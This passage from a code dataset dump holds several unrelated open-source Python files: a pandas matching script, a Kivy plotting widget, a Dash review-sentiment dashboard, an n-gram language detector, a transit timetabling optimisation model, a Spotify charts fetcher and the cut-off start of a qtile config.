1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\ndf_over_18 = df[df['Age'] > 18]\n\n#Over 18 Male and Female filter\ndf_M_over_18 = df_over_18[df_over_18['Gender'] == 'Male']\ndf_F_over_18 = df_over_18[df_over_18['Gender'] == 'Female']\n\n\n'''------------------------------Same Gender over 18-----------------------------'''\n\n#over 18 Males that prefer Males\ndf_M_over_18_PM = df_M_over_18[df_M_over_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_M_over_PM = {}\nk = 0\n\nwhile len(df_M_over_18_PM) > 1:\n    df_M_over_18_PM.reset_index(drop=True, inplace=True)\n    dic_M_over_PM[\"Match_M_over_PM{0}\".format(k)] = df_M_over_18_PM.iloc[:2]\n\n    df_M_over_18_PM.reset_index(drop=True, inplace=True)\n    df_M_over_18_PM = df_M_over_18_PM.drop([df_M_over_18_PM.index[0], df_M_over_18_PM.index[1]])\n\n    k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#over 18 females that Prefer Females\ndf_F_over_18_PF = df_F_over_18[df_F_over_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_over_PF = {}\nk = 0\nwhile len(df_F_over_18_PF) > 1:\n\n    df_F_over_18_PF.reset_index(drop=True, inplace=True)\n    dic_F_over_PF[\"Match_F_over_PF{0}\".format(k)] = df_F_over_18_PF.iloc[:2]\n\n    df_F_over_18_PF.reset_index(drop=True, inplace=True)\n    df_F_over_18_PF = df_F_over_18_PF.drop([df_F_over_18_PF.index[0], df_F_over_18_PF.index[1]])\n\n    k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''------------------------------Opposite Gender over 18-----------------------------'''\n\n#over 18 Males that prefer Females\ndf_M_over_18_PF = 
df_M_over_18[df_M_over_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#over 18 Females that prefer Males\ndf_F_over_18_PM = df_F_over_18[df_F_over_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_over_PM = {}\nk = 0\nwhile len(df_M_over_18_PF) > 1 and len(df_F_over_18_PM) > 1:\n df_M_over_18_PF.reset_index(drop=True, inplace=True)\n df_F_over_18_PM.reset_index(drop=True, inplace=True)\n\n dic_F_over_PM[\"Match_MF_over_PFM{0}\".format(k)] = [df_M_over_18_PF.iloc[:1], df_F_over_18_PM.iloc[:1]]\n\n df_M_over_18_PF.reset_index(drop=True, inplace=True)\n df_F_over_18_PM.reset_index(drop=True, inplace=True)\n\n df_M_over_18_PF = df_M_over_18_PF.drop([df_M_over_18_PF.index[0]])\n df_F_over_18_PM = df_F_over_18_PM.drop([df_F_over_18_PM.index[0]])\n\n k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''-----------------------------------Either over 18-------------------------------------------'''\n\n\ndf_E_over_18_PE = df_over_18[df_over_18['PG'] == 'Either']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_E_over_PE = {}\nk = 0\n\nwhile len(df_E_over_18_PE) > 1:\n\n df_E_over_18_PE.reset_index(drop=True, inplace=True)\n dic_E_over_PE[\"Match_E_over_PE{0}\".format(k)] = df_E_over_18_PE.iloc[:2]\n\n df_E_over_18_PE.reset_index(drop=True, inplace=True)\n df_E_over_18_PE = df_E_over_18_PE.drop([df_E_over_18_PE.index[0], df_E_over_18_PE.index[1]])\n\n k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nprint(dic_M_under_PM)\nprint(dic_F_under_PF)\nprint(dic_MF_under_PFM)\nprint(dic_E_under_PE)\n\n\nprint(dic_M_over_PM)\nprint(dic_F_over_PF)\n#print(dic_MF_over_PFM)\nprint(dic_E_over_PE)\n\n\n","repo_name":"Zerkue/Friends-Matching","sub_path":"tiktokmatch.py","file_name":"tiktokmatch.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41829285367","text":"import numpy as np\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.button import Button\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.stacklayout import StackLayout\nfrom kivy.properties import ObjectProperty, StringProperty, NumericProperty, OptionProperty, BooleanProperty\nfrom kivy.core.window import Window\nfrom kivy.graphics.transformation import Matrix\nfrom functools import partial\nimport os\nfrom kivy.graphics.context_instructions import *\nfrom kivy.graphics import RenderContext\nfrom kivy.clock import Clock\n\nimport rvit.core\nfrom ..configurable_property import ConfigurableProperty\n\n\nclass RvitWidget(FloatLayout):\n unique_name = StringProperty('')\n target_object = ObjectProperty(None)\n target_varname = StringProperty('')\n show_controls = BooleanProperty(True)\n auto_update = BooleanProperty(True)\n update_interval = NumericProperty(1.0 / 60.0)\n xmin = NumericProperty(-1.)\n xmax = NumericProperty(1.)\n ymin = NumericProperty(-1.)\n ymax = NumericProperty(1.)\n preprocess = StringProperty('')\n secondary_preprocess = StringProperty('')\n\n def __init__(self, *args, **kwargs):\n self.render_context = RenderContext()\n super(RvitWidget, self).__init__(**kwargs)\n self.top_buttons = BoxLayout(orientation='horizontal',\n size_hint=(1.0, None),\n size=(0, 20),\n pos_hint={'right': 1.0,\n 'top': 1.0},)\n 
self.title_label = Label()\n self.top_buttons.add_widget(self.title_label)\n\n self.configurable_properties = {}\n\n if 'inspect' in dir(self):\n self.inspect_button = Button(text='inspect',\n on_press=lambda x: self.inspect(),\n background_color=rvit.core.WHITE,\n pos_hint={'x': 0.0, 'top': 1.0})\n\n self.top_buttons.add_widget(self.inspect_button)\n\n self.disable_button = ToggleButton(size_hint=(None, None),\n background_color=rvit.core.RED,\n size=(20, 20),\n state='down',\n )\n\n def enabled_state_changed(inst, value):\n self.enabled = value == 'down'\n self.enabled = True\n self.disable_button.bind(state=enabled_state_changed)\n self.top_buttons.add_widget(self.disable_button)\n\n self.add_widget(self.top_buttons)\n\n self.render_context['modelview_mat'] = Matrix().identity()\n self.render_context['projection_mat'] = Matrix().identity()\n self.render_context['window_size'] = [float(Window.width), float(Window.height)]\n self.canvas.before.add(self.render_context)\n\n self.update_event = None\n # self.update_interval.dispatch()\n # self.on_show_controls\n\n prop = self.property('update_interval')\n # dispatch this property on the button instance\n prop.dispatch(self)\n\n def addConfigurableProperty(self, prop):\n self.configurable_properties[prop.name] = ConfigurableProperty(prop, self)\n\n def removeConfigurableProperty(self, prop):\n self.configurable_properties.pop(prop.name)\n\n def registerConfigurableProperties(self):\n self.addConfigurableProperty(RvitWidget.xmin)\n self.addConfigurableProperty(RvitWidget.xmax)\n self.addConfigurableProperty(RvitWidget.ymin)\n self.addConfigurableProperty(RvitWidget.ymax)\n\n def on_unique_name(self, obj, unique_name):\n \"\"\"Once the widget is given a non-empty unique name, set up its\n configuration panel UI.\n\n \"\"\"\n\n if unique_name != '':\n self.title_label.text = unique_name\n self.registerConfigurableProperties()\n if len(self.configurable_properties) > 0:\n def test(value):\n content = StackLayout()\n for k in self.configurable_properties.keys():\n content.add_widget(\n self.configurable_properties[k].getConfigurationSubpanel())\n popup = Popup(title='Configure', content=content)\n popup.open()\n\n self.configure_button = Button(text='configure',\n on_press=test,\n background_color=rvit.core.BLUE,\n pos_hint={'x': 0.0, 'top': 1.0})\n\n self.top_buttons.add_widget(self.configure_button, index=2)\n\n def updateProjectionMatrices(self):\n \"\"\" makes 0,0 the lower left corner and 1,1 the upper right \"\"\"\n w = float(Window.width)\n h = float(Window.height)\n m = Matrix().identity()\n p = rvit.core.BUTTON_BORDER_HEIGHT\n # self.projection_r = min(self.size[0],self.size[1]-p)\n # m.scale(self.projection_r/w*2,\n # self.projection_r/h*2,1.0)\n m.scale(2.0 * self.width / w,\n 2.0 * (self.height - p) / h, 1.0)\n m.translate(-1.0 + (self.pos[0]) * 2.0 / w,\n -1.0 + (self.pos[1]) * 2.0 / h,\n 0.0)\n self.render_context['projection_mat'] = m\n\n def updateModelViewMatrix(self):\n m = Matrix().identity()\n hr = max(0.00001, (self.xmax - self.xmin))\n vr = max(0.00001, (self.ymax - self.ymin))\n m.scale(1.0 / hr,\n 1.0 / vr,\n 1.0)\n m.translate(-self.xmin / hr,\n -self.ymin / vr,\n 0.0)\n self.render_context['modelview_mat'] = m\n\n def on_size(self, inst, value):\n self.updateProjectionMatrices()\n\n def on_pos(self, inst, value):\n self.updateProjectionMatrices()\n\n def on_show_controls(self, inst, value):\n if value == True:\n self.add_widget(self.top_buttons)\n else:\n if self.top_buttons in self.children:\n 
self.remove_widget(self.top_buttons)\n\n def createInspectionDumpFile(self):\n try:\n os.makedirs(skivy.inspection_path)\n except os.error:\n pass\n\n datafile_name = filter(str.isalnum, self.unique_name)\n return os.path.join(skivy.inspection_path, datafile_name)\n\n def launchInspector(self, datafile_name):\n from subprocess import call\n\n inspection_script_name = 'inspect_%s.py' % (filter(str.isalnum, self.unique_name))\n inspection_script_path = os.path.join(skivy.inspection_path, inspection_script_name)\n with open(inspection_script_path, \"w\") as text_file:\n text_file.write('from pylab import *\\n')\n text_file.write('a = np.load(\"%s\")\\n' % (datafile_name))\n text_file.write(\"print('%s is loaded in the variable called `a`')\\n\" % (datafile_name))\n\n instructions = ['gnome-terminal', '-e',\n \"\"\" bash -c \"cd \"\"\" + skivy.inspection_path +\n \"\"\" ; ipython -i \"\"\" + inspection_script_name + \"\"\" \" \"\"\"]\n call(instructions)\n\n def on_target_object(self, inst, value):\n self.target_object = value\n self.setTarget()\n\n def on_target_varname(self, inst, value):\n self.target_varname = value\n self.setTarget()\n\n def on_xmin(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_xmax(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_ymin(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_ymax(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_preprocess(self, obj, value):\n self.preprocess = value\n s = 'self.preprocess_fn = %s' % (self.preprocess)\n exec(s)\n\n def on_secondary_preprocess(self, obj, value):\n self.secondary_preprocess = value\n s = 'self.secondary_preprocess_fn = %s' % (self.secondary_preprocess)\n exec(s)\n\n def apply_preprocessing(self, data):\n if self.preprocess != '':\n return self.preprocess_fn(data)\n else:\n return data\n\n def apply_secondary_preprocessing(self, data):\n if self.secondary_preprocess != '':\n return self.secondary_preprocess_fn(data)\n else:\n return data\n\n def on_update_interval(self, obj, value):\n if self.update_event is not None:\n self.update_event.cancel()\n\n if self.auto_update:\n def iterate(a):\n self.update()\n self.update_event = Clock.schedule_interval(iterate, self.update_interval)\n\n\nclass ScaledValues(RvitWidget):\n # minimum_value = OptionProperty('auto',options=['0','-1','-pi','auto'])\n # maximum_value = OptionProperty('auto',options=['0','1','pi','auto'])\n minimum_value = StringProperty('auto') # ,options=['0','-1','-pi','auto'])\n maximum_value = StringProperty('auto') # ,options=['0','1','pi','auto'])\n\n def __init__(self, *args, **kwargs):\n super(ScaledValues, self).__init__(**kwargs)\n\n self.cur_max_label = Label(text='max',\n size_hint=(None, None),\n size=(100, 20),\n pos_hint={'right': 1.0,\n 'top': 0.95},)\n self.cur_min_label = Label(text='min',\n size_hint=(None, None),\n size=(100, 20),\n pos_hint={'right': 1.0,\n 'y': 0.0},)\n self.cur_min_label.text_size = self.cur_min_label.size\n self.cur_max_label.text_size = self.cur_max_label.size\n\n self.add_widget(self.cur_min_label) # hohee\n self.add_widget(self.cur_max_label) # hohee\n\n def registerConfigurableProperties(self):\n cp = super(ScaledValues, self).registerConfigurableProperties()\n self.addConfigurableProperty(ScaledValues.minimum_value)\n self.addConfigurableProperty(ScaledValues.maximum_value)\n\n\nclass SecondaryDataSource(RvitWidget):\n secondary_varname = StringProperty('')\n\n def __init__(self, *args, **kwargs):\n super(SecondaryDataSource, self).__init__(**kwargs)\n\n def 
on_secondary_varname(self, obj, value):\n self.secondary_varname = value\n if self.target_object is not None and self.secondary_varname != '':\n s = 'self.b = self.target_object.%s' % (self.secondary_varname)\n exec(s)\n\n\n# ### Local Variables: ###\n# ### mode: python ###\n# ### python-main-file: \"main.py\" ###\n# ### python-working-dir: \"../minimal_project/\" ###\n# ### End: ###\n","repo_name":"matthew-egbert/rvit","sub_path":"rvit/core/widgets/rvit_widget.py","file_name":"rvit_widget.py","file_ext":"py","file_size_in_byte":10917,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"34279660488","text":"import pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Sampled dataframe 'sampled_df' containing the required columns\n# Replace this with your actual dataframe\n# sampled_df = pd.read_csv('path_to_sampled_df.csv') # Load your data here\n\nsampled_df = pd.read_csv(r'https://raw.githubusercontent.com/ZaidAlmelhem/Dashboards/main/Distribution%20of%20Review%20Scores%20for%20Mobile%20Apps/sampled_df_8_7.csv')\n\n# Create a Dash app\napp = dash.Dash(__name__)\nserver = app.server\n\n# Layout of the app\napp.layout = html.Div([\n html.H1(\"Sentiment Analysis Dashboard\"),\n \n # Dropdown to select the name of the app\n html.Label(\"Select the Name of the App:\"),\n dcc.Dropdown(\n id='app-name-dropdown',\n options=[{'label': app_name, 'value': app_name} for app_name in sampled_df['app_name'].unique()],\n value=sampled_df['app_name'].unique()[0],\n ),\n \n # Slider to filter the score\n html.Label(\"Select Score Filter:\"),\n dcc.Slider(\n id='score-filter-slider',\n min=1,\n max=5,\n value=3,\n marks={i: str(i) for i in range(1, 6)},\n step=1\n ),\n \n # Placeholder for displaying the reviews and sentiment analysis\n html.Div(id='review-sentiment-container'),\n])\n\n# Callback to update the review and sentiment analysis display\n@app.callback(\n Output('review-sentiment-container', 'children'),\n Input('app-name-dropdown', 'value'),\n Input('score-filter-slider', 'value')\n)\ndef update_review_sentiment(app_name, score_filter):\n filtered_reviews = sampled_df[(sampled_df['app_name'] == app_name) & (sampled_df['score'] == score_filter)]\n \n review_sentiment_html = []\n for _, row in filtered_reviews.iterrows():\n review_sentiment_html.append(html.Div([\n html.H3(f\"Review {row.name}\"),\n html.P(f\"Review Text: {row['review']}\"),\n html.P(f\"Processed Text: {row['processed_text']}\"),\n html.P(f\"Score: {row['score']}\"),\n html.P(f\"TextBlob Sentiment Score: {row['textblob_sentiment_score']}\"),\n html.P(f\"Bert Sentiment Score: {row['bert_sentiment_score']}\"),\n html.P(f\"Segmented Bert Sentiment Score: {row['segmented_bert_sentiment_score']}\"),\n html.Hr(),\n ]))\n \n return review_sentiment_html\n\n# Run the app\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"ZaidAlmelhem/Dashboards","sub_path":"Distribution of Review Scores for Mobile Apps/dashboard_4.py","file_name":"dashboard_4.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38652139823","text":"import math\nfrom collections import Counter\n\n\ndef prepare(text):\n \"\"\"\n Returns a list of words in a string.\n Certain characters are replaced by whitespace, and the text is split based on whitespaces.\n @param: text: string (The text of which to 
return a wordlist)\n    \"\"\"\n    badCharacters = [\"!\", \"?\", \",\", \".\", \"\\\"\", \"(\", \")\", \"<\", \">\"]\n    splitText = [char for char in text]\n    for i in range(len(splitText)):\n        if splitText[i] in badCharacters:\n            splitText[i] = \" \"\n    wordString = ''.join(splitText)\n    wordList = wordString.split()\n    return wordList\n\n\ndef ngrams(seq, n=3):\n    \"\"\"\n    Returns a list of n-grams in a string.\n    @param: seq: string (The string for which n-grams must be returned)\n    @param: n: int, default: 3 (Type of n-grams to return)\n    \"\"\"\n    #! This could be done more simply\n    ngramList = []\n    for i in range(len(seq) - (n-1)):\n        ngram = \"\"\n        for j in range(n):\n            ngram += seq[i + j]\n        ngramList.append(ngram)\n    return ngramList\n\n\ndef ngram_table(text, n=3, limit=0):\n    \"\"\"\n    Returns a table of a text's n-grams and their counts, sorted by their counts.\n    @param: text: string (The text for which to make an n-gram table)\n    @param: n: int (The type of n-gram)\n    @param: limit: int (The maximum amount of n-grams in the returned table)\n    \"\"\"\n    Tlist = prepare(text)\n    foundNgrams = {}\n    for element in Tlist:\n        element = ('<' + element + '>')\n        ngramList = ngrams(element, n)\n        for ngram in ngramList:\n            if ngram in foundNgrams:\n                foundNgrams[ngram] += 1\n            else:\n                foundNgrams[ngram] = 1\n    sortedNgrams = {}\n    teller = 0\n    for k, v in sorted(foundNgrams.items(), reverse=True, key=lambda x: x[1]):\n        if teller < limit or limit == 0:\n            sortedNgrams[k] = v\n            teller += 1\n    return sortedNgrams\n\n\ndef write_ngrams(table, filename):\n    \"\"\"\n    Writes the contents of an n-gram table to a file.\n    @param: table: dict (The n-gram table to write to a file)\n    @param: filename: string (The name of the file to write to)\n    \"\"\"\n    with open(filename, \"w\", encoding=\"utf8\") as conn:\n        for line in table:\n            conn.write(str(table[line]))\n            conn.write(\" \")\n            conn.write(str(line))\n            conn.write(\"\\n\")\n\n\ndef read_ngrams(filename):\n    \"\"\"\n    Reads a file and returns an n-gram table with the n-grams and counts in the file.\n    @param: filename: string (The name of the file from which to read)\n    \"\"\"\n    with open(filename, encoding=\"utf8\") as conn:\n        alltext = conn.read()\n    splitText = alltext.splitlines()\n    table = {}\n    for line in splitText:\n        splitLine = line.split()\n        table[splitLine[1]] = int(splitLine[0])\n    return table\n\n\ndef cosine_similarity(table1, table2):\n    \"\"\"\n    Calculates and returns the cosine similarity between two tables of n-grams\n    @param: table1: dict (The first table to compare)\n    @param: table2: dict (The second table to compare)\n    \"\"\"\n    a = Counter(table1)\n    b = Counter(table2)\n    termen = set(a).union(b)\n    product = sum(a.get(k, 0) * b.get(k, 0) for k in termen)\n    berekeningA = math.sqrt(sum(a.get(k, 0)**2 for k in termen))\n    berekeningB = math.sqrt(sum(b.get(k, 0)**2 for k in termen))\n    return product / (berekeningA * berekeningB)\n","repo_name":"tsjabie-o/Language-detector","sub_path":"langdetect.py","file_name":"langdetect.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44309371218","text":"import logging\nfrom typing import Dict, Union\n\nfrom core.exceptions.algorithm_dijkstra import AlgorithmStoppingCriterionException\nfrom core.solver.generic_solver_interface import IntAttribute, Model, Variable, VariableType, LinearExpression, \\\n    OptimizationSense, ConstraintSense, Status, DoubleAttribute\nfrom ean_data import EanEvent, EanActivity, Ean, AperiodicEan\nfrom 
lin_veh_to_tim_helper import LinVehToTimParameters\nfrom line_data import LinePool, Line\nfrom vehicle_schedule import VehicleSchedule\nfrom vs_helper import TurnaroundData\nfrom write_csv import write_periodic_timetable, write_aperiodic_ean, write_solver_statistic, write_vehicle_schedule\n\nlogger = logging.getLogger(__name__)\n\n\nclass LinVehToTimGenericModel:\n\n def __init__(self, parameters: LinVehToTimParameters, ean: Ean, line_pool: LinePool,\n vehicle_schedule: VehicleSchedule, turn_around_data: TurnaroundData) -> None:\n # Given data\n self._parameters = parameters\n self._line_pool = line_pool\n self._ean = ean\n self._turn_around_data = turn_around_data\n self._vehicle_schedule = vehicle_schedule\n\n # Instance data\n\n # Model data\n self._m = None # type: Union[None, Model]\n self.is_feasible = False\n self._pi = {} # type: Dict[EanEvent, Variable]\n self._modulo_parameter = {} # type: Dict[EanActivity, Variable]\n self._duration = {} # type: Dict[Line, Variable]\n self._start = {} # type: Dict[Line, Dict[int, Variable]]\n self._end = {} # type: Dict[Line, Dict[int, Variable]]\n\n def create_model(self) -> None:\n self._m = self._parameters.initialize_generic_model()\n self._create_variables()\n self._initialize_objective_function()\n self._create_constraints()\n if self._parameters.write_lp_output:\n self._write_lp_output()\n\n def _create_variables(self) -> None:\n logger.debug(\"Initialize variables\")\n self._add_timetabling_variables()\n self._add_duration_variables()\n self._add_start_variables()\n self._add_end_variables()\n logger.debug(f\"Number of variables: {self._m.getIntAttribute(IntAttribute.NUM_VARIABLES)}\")\n\n def _add_timetabling_variables(self):\n for event in self._ean.get_events_network():\n self._pi[event] = self._m.addVariable(0, self._parameters.period_length - 1, VariableType.INTEGER,\n name=f'pi_{event.get_event_id()}')\n if self._parameters.set_starting_timetable:\n self._m.setStartValue(self._pi[event], event.get_event_time())\n for activity in self._ean.get_all_activities():\n self._modulo_parameter[activity] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'z_{activity.get_activity_id()}')\n\n def _add_duration_variables(self):\n for line in self._line_pool.get_lines():\n self._duration[line] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'duration_{line}')\n\n def _add_start_variables(self):\n for line in self._line_pool.get_lines():\n self._start[line] = {}\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n self._start[line][p] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'start({p},{line})')\n\n def _add_end_variables(self):\n for line in self._line_pool.get_lines():\n self._end[line] = {}\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n self._end[line][p] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'end({p},{line})')\n\n def _initialize_objective_function(self) -> None:\n logger.debug(\"Initialize objective function\")\n sum_travel_time = self._m.createExpression()\n sum_drive_time = self._m.createExpression()\n sum_wait_time = self._m.createExpression()\n sum_transfer_time = self._m.createExpression()\n\n for activity in self._ean.get_activities(['drive', 'wait', 'trans']):\n sum_travel_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n if activity.get_activity_type() == 'drive':\n sum_drive_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n elif activity.get_activity_type() == 'wait':\n 
sum_wait_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n elif activity.get_activity_type() == 'trans':\n sum_transfer_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n\n objective = self._m.createExpression()\n objective.multiAdd(self._parameters.factor_travel_time, sum_travel_time)\n objective.multiAdd(self._parameters.factor_drive_time, sum_drive_time)\n objective.multiAdd(self._parameters.factor_wait_time, sum_wait_time)\n objective.multiAdd(self._parameters.factor_transfer_time, sum_transfer_time)\n self._m.setObjective(objective, OptimizationSense.MINIMIZE)\n\n def _get_duration(self, activity: EanActivity) -> LinearExpression:\n duration = self._m.createExpression()\n duration.addTerm(1, self._pi[activity.get_right_event()])\n duration.addTerm(-1, self._pi[activity.get_left_event()])\n duration.addTerm(self._parameters.period_length, self._modulo_parameter[activity])\n return duration\n\n def _create_constraints(self):\n logger.debug(\"Add constraints:\")\n self._add_timetabling_constraints()\n self._add_duration_constraints()\n self._add_start_and_end_constraints()\n self._add_time_difference_constraints()\n\n def _add_timetabling_constraints(self):\n logger.debug(\"\\ttimetabling\")\n for activity in self._ean.get_all_activities():\n duration = self._get_duration(activity)\n self._m.addConstraint(duration, ConstraintSense.GREATER_EQUAL, activity.get_lower_bound(),\n f\"l_{activity.get_activity_id()}\")\n self._m.addConstraint(duration, ConstraintSense.LESS_EQUAL, activity.get_upper_bound(),\n f\"u_{activity.get_activity_id()}\")\n\n def _add_duration_constraints(self):\n logger.debug(\"\\tduration of a line\")\n duration_expression = self._m.createExpression()\n for line in self._line_pool.get_lines():\n duration_expression.clear()\n for activity in self._ean.get_activities_in_line(line):\n duration_expression.add(self._get_duration(activity))\n duration_expression.addTerm(-1, self._duration[line])\n self._m.addConstraint(duration_expression, ConstraintSense.EQUAL, 0,\n f\"duration_{line}\")\n\n def _add_start_and_end_constraints(self):\n logger.debug(\"\\tstart and end\")\n lhs = self._m.createExpression()\n for line in self._line_pool.get_lines():\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n lhs.clear()\n lhs.addTerm(1, self._start[line][p])\n lhs.addTerm(-1, self._pi[self._ean.get_first_event_in_line(line)])\n self._m.addConstraint(lhs, ConstraintSense.EQUAL, (p - 1) * self._parameters.period_length,\n f\"start({p},{line})\")\n lhs.clear()\n lhs.addTerm(1, self._end[line][p])\n lhs.addTerm(-1, self._pi[self._ean.get_first_event_in_line(line)])\n lhs.addTerm(-1, self._duration[line])\n self._m.addConstraint(lhs, ConstraintSense.EQUAL, (p - 1) * self._parameters.period_length,\n f\"end({p},{line})\")\n\n def _add_time_difference_constraints(self):\n logger.debug(\"\\tminimum time difference\")\n lhs = self._m.createExpression()\n for connection in self._vehicle_schedule.get_connections():\n p_1 = connection.get_period_1()\n l_1 = connection.get_line_1()\n p_2 = connection.get_period_2()\n l_2 = connection.get_line_2()\n lhs.clear()\n lhs.addTerm(1, self._start[l_2][p_2])\n lhs.addTerm(-1, self._end[l_1][p_1])\n self._m.addConstraint(lhs, ConstraintSense.GREATER_EQUAL,\n self._turn_around_data.get_min_turnaround_time(l_1.get_last_stop(),\n l_2.get_first_stop()),\n f\"L({l_1},{p_1},{l_2},{p_2})\")\n\n def _write_lp_output(self):\n self._m.write(\"LinVehToTim.lp\")\n\n def solve(self):\n logger.debug(\"Start 
optimization\")\n self._m.solve()\n self.is_feasible = self._m.getIntAttribute(IntAttribute.NUM_SOLUTIONS) > 0\n if not self.is_feasible:\n logger.debug(\"No feasible solution found\")\n if self._m.getStatus() == Status.INFEASIBLE:\n self._m.computeIIS(\"LinVehToTim.ilp\")\n raise AlgorithmStoppingCriterionException(\"Lin Veh To Tim\")\n if self._m.getStatus() == Status.OPTIMAL:\n logger.debug(\"Optimal solution found\")\n else:\n logger.debug(\"Feasible solution found\")\n logger.debug(f\"Objective: {self._m.getDoubleAttribute(DoubleAttribute.OBJ_VAL)}\")\n logger.debug(\"End optimization\")\n\n def write_output(self):\n logger.debug(\"Start constructing output\")\n pi_solution = {event: int(round(self._m.getValue(self._pi[event]))) for event in self._pi.keys()}\n duration_solution = {line: int(round(self._m.getValue(var))) for line, var in self._duration.items()}\n write_solver_statistic(self._parameters, self._m.getIntAttribute(IntAttribute.RUNTIME),\n self._m.getDoubleAttribute(DoubleAttribute.MIP_GAP),\n self._m.getDoubleAttribute(DoubleAttribute.OBJ_VAL))\n write_periodic_timetable(self._parameters, self._ean, pi_solution)\n for vehicle in self._vehicle_schedule.get_vehicles():\n vehicle.find_all_connections(self._vehicle_schedule.get_connections())\n logger.debug(\"Construct aperiodic ean:\")\n aperiodic_ean = AperiodicEan(self._ean)\n aperiodic_ean.aperiodic_ean_from_vehicle_schedule(self._ean, self._vehicle_schedule, duration_solution,\n pi_solution, self._parameters.period_length)\n aperiodic_ean.update_aperiodic_times(self._parameters.ean_earliest_time)\n write_aperiodic_ean(self._parameters, self._ean, aperiodic_ean)\n write_vehicle_schedule(self._parameters, self._ean, aperiodic_ean, self._vehicle_schedule, duration_solution,\n self._parameters.period_length)\n","repo_name":"kaat0/OpenLinTim","sub_path":"src/integrated_models/eigenmodel/lin_veh_to_tim/lin_veh_to_tim_generic.py","file_name":"lin_veh_to_tim_generic.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3144387378","text":"import requests\n\nglobal_charts = 'https://spotifycharts.com/regional/global/daily/latest/download'\nglobal_page = requests.get(global_charts)\nprint(global_page.content)\n\nsongs = 'regional'\narea = 'global'\ntime = 'daily'\nperiod = 'latest'\n\nchart = 'https://spotifycharts.com/%s/%s/%s/%s/download' % (\n songs, area, time, period)\npage = requests.get(chart)\nprint(page.content)\n","repo_name":"Ahmadjawaid/verbose-bassoon","sub_path":"spotify_charts.py","file_name":"spotify_charts.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24396815762","text":"import os\nimport subprocess\nfrom libqtile import hook\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom colors import gruvbox\n\nmod = \"mod4\"\nmod1 = \"mod1\"\nterminal = \"terminator\"\n\n\nkeys = [\n ### The essentials\n Key([mod], \"Return\",\n lazy.spawn(terminal),\n desc='Launches My Terminal'\n ),\n Key([mod1, \"shift\"], \"c\",\n lazy.spawn(\"google-chrome-stable\"),\n desc='Launches My Chrome'\n ),\n Key([mod, \"shift\"], \"Return\",\n lazy.spawn(\"/home/abhi/.config/rofi/launchers/type-2/launcher.sh\"),\n desc='Run Launcher'\n ),\n Key([mod, \"shift\"], \"x\",\n 
